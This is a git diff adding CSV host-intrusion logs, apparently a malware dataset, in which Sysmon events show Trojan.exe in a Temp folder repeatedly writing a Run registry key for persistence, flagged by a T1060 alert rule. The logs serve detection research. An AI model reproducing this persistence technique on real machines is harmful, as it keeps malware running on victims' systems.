2020 @ 09:24:38.644",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\EventLog\System\MSDTC Gateway' was added. 
+" +"Apr 7, 2020 @ 09:24:31.581",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\EventLog\Security\ServiceModel 3.0.0.0' was added. +" +"Apr 7, 2020 @ 09:24:31.393",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\EventLog\Application\System.ServiceModel 3.0.0.0' was added. +" +"Apr 7, 2020 @ 09:24:31.378",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\EventLog\Application\System.Runtime.Serialization 3.0.0.0' was added. +" +"Apr 7, 2020 @ 09:24:31.362",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\EventLog\Application\System.IO.Log 3.0.0.0' was added. +" +"Apr 7, 2020 @ 09:24:31.346",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\EventLog\Application\System.IdentityModel 3.0.0.0' was added. +" +"Apr 7, 2020 @ 09:24:30.315",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\EventLog\Application\ServiceModel Audit 3.0.0.0' was added. +" +"Apr 7, 2020 @ 09:24:30.253",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\EventLog\Application\Microsoft.Transactions.Bridge 3.0.0.0' was added. +" +"Apr 7, 2020 @ 09:24:27.815",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\EventLog\Application\ASP.NET 2.0.50727.0' was added. +" +"Apr 7, 2020 @ 09:24:22.990",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\clr_optimization_v2.0.50727_64' was added. +" +"Apr 7, 2020 @ 09:24:22.974",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\clr_optimization_v2.0.50727_32' was added. 
+" +"Apr 7, 2020 @ 09:24:16.946",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. +Old md5sum was: '5a39cd62b5ce5f55c1fc9302fe23485c' +New md5sum is : 'e510c2836bdf17e888da83477202fdf2' +Old sha1sum was: 'de83c0bb18a5c320f0a1adb8c5dab09d7be63679' +New sha1sum is : '5b0363519c9bfe1d8b5e43ec76b79940f2cbabd8' +" +"Apr 7, 2020 @ 09:24:12.330",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\.NET CLR Networking\Performance' checksum changed. +Old md5sum was: 'c9339e2022b419c80316c1973733b12b' +New md5sum is : 'c6ee36dd578cc295e6e7873d06f20236' +Old sha1sum was: '42a5ef8d2e511d73acbe97a1589613afc16099c9' +New sha1sum is : 'b5518c6da94b7f3ab25c6e199cef22df5a02ef16' +" +"Apr 7, 2020 @ 09:24:12.316",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\.NET CLR Networking\Linkage' checksum changed. +Old md5sum was: 'f2496e76843d3318dccb05e89de48e65' +New md5sum is : '22eccf8057abaee681c65921ed4dfd76' +Old sha1sum was: 'd1f1c760d953bccde63b6d040be4ac1547b9f8da' +New sha1sum is : '75b9f63fb39d8326b5d1fbe4cfd4f444e3138efb' +" +"Apr 7, 2020 @ 09:24:11.299",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\.NET CLR Data\Performance' checksum changed. +Old md5sum was: '2f43dfc7a4f84a246bcfda248e5ab44f' +New md5sum is : '603235ac17c08e2e792cc1e066accf4a' +Old sha1sum was: 'e8c0484ba1276d30bd9f673e47502e2c0eca65e1' +New sha1sum is : 'c3e400ae2d44428000be5d8ecae4de21384ad7b2' +" +"Apr 7, 2020 @ 09:24:11.282",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\.NET CLR Data\Linkage' checksum changed. 
+Old md5sum was: '6316cf64e18ca66898bade4b8efd333c' +New md5sum is : 'd946ca647fd33e7e2dfb13b31d3aa068' +Old sha1sum was: 'd97a575a82ce1f2cbd79316da61e2b230f81a402' +New sha1sum is : '223e6c8e127a0c2814fb50f5f7020810dab8f9b9' +" +"Apr 7, 2020 @ 09:23:55.016",3,"Windows Logon Success", +"Apr 7, 2020 @ 09:23:48.606",3,"Service startup type was changed", +"Apr 7, 2020 @ 09:23:07.453",5,"File added to the system.","File '[x64] HKEY_LOCAL_MACHINE\Software\Classes\Protocols\Filter\application/x-msdownload' was added. +" +"Apr 7, 2020 @ 09:23:07.422",5,"File added to the system.","File '[x64] HKEY_LOCAL_MACHINE\Software\Classes\Protocols\Filter\application/x-complus' was added. +" +"Apr 7, 2020 @ 09:23:07.406",5,"File added to the system.","File '[x64] HKEY_LOCAL_MACHINE\Software\Classes\Protocols\Filter\application/octet-stream' was added. +" +"Apr 7, 2020 @ 09:23:06.405",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\Software\Classes\Protocols\Filter\application/x-msdownload' was added. +" +"Apr 7, 2020 @ 09:23:06.390",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\Software\Classes\Protocols\Filter\application/x-complus' was added. +" +"Apr 7, 2020 @ 09:23:06.375",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\Software\Classes\Protocols\Filter\application/octet-stream' was added. +" +"Apr 7, 2020 @ 09:22:54.671",3,"Service startup type was changed", +"Apr 7, 2020 @ 09:22:48.890",3,"Windows Logon Success", +"Apr 7, 2020 @ 09:22:48.843",3,"Windows Logon Success", +"Apr 7, 2020 @ 09:21:30.997",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits' checksum changed. 
+Old md5sum was: 'e61d4dd51aecfa812eb5dd09547bb3fa' +New md5sum is : '02583aa1ae32b1990176644dc3952c81' +Old sha1sum was: 'dbf704cda5f548a498bb22a7c8acb6fc63869305' +New sha1sum is : '0ba688310b1196088281fa0da17b1e9c2f96ea7e' +" +"Apr 7, 2020 @ 09:21:30.919",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime' checksum changed. +Old md5sum was: '3bed6b4b8101da842bb6afe04a8271c2' +New md5sum is : 'd3c3db84b379850af744b570210159ac' +Old sha1sum was: '6bcfa900864cb27898f9c3bf26b53fb3b0eb9d2c' +New sha1sum is : '61986d785485024b932a0f9116e6a930eddd2d4b' +" +"Apr 7, 2020 @ 09:21:23.825",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\TrustedInstaller' checksum changed. +Old md5sum was: 'f5ea91602eb594fc2b4973f59a513fcb' +New md5sum is : '06f5c6f330af834dd08ce904d9ae7cc8' +Old sha1sum was: '7d45a8c18f8a7d6091a33c6ba0252b375312ca0c' +New sha1sum is : '0cf4c4c19a1201e41b9deba273320298f4f97b50' +" +"Apr 7, 2020 @ 09:21:20.262",3,"Service startup type was changed", +"Apr 7, 2020 @ 09:21:12.715",3,"Windows Logon Success", diff --git a/data/MW_9_HIDS_3.csv b/data/MW_9_HIDS_3.csv new file mode 100644 index 0000000..6a82114 --- /dev/null +++ b/data/MW_9_HIDS_3.csv 
@@ -0,0 +1,4442 @@ +timestamp,"rule.level","rule.description","data.win.system.message","data.win.eventdata.commandLine","data.win.eventdata.targetObject","full_log","data.win.eventdata.details" +"May 24, 2020 @ 16:28:21.069",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:28:17.402 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:28:17.430124200Z"",""eventRecordID"":""2055"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:28:17.402\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 
16:28:17.402"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:28:19.753",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:28:16.387 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:28:16.393106800Z"",""eventRecordID"":""2054"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:28:16.387\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: 
HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:28:16.387"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:28:18.754",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:28:15.372 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" 
..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:28:15.377777100Z"",""eventRecordID"":""2053"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:28:15.372\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:28:15.372"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." 
+"May 24, 2020 @ 16:28:17.723",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:28:14.355 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:28:14.370952600Z"",""eventRecordID"":""2052"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:28:14.355\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:28:14.355"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John 
Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:28:16.771",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:28:13.326 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:28:13.333494600Z"",""eventRecordID"":""2051"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:28:13.326\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: 
HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:28:13.326"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:28:15.726",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:28:12.293 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" 
..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:28:12.305943800Z"",""eventRecordID"":""2050"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:28:12.293\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:28:12.293"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." 
+"May 24, 2020 @ 16:28:14.676",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:28:11.277 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:28:11.292349100Z"",""eventRecordID"":""2049"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:28:11.277\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:28:11.277"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John 
Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:28:13.704",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:28:10.261 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:28:10.277974500Z"",""eventRecordID"":""2048"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:28:10.261\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: 
HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:28:10.261"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:28:11.622",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:28:09.215 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" 
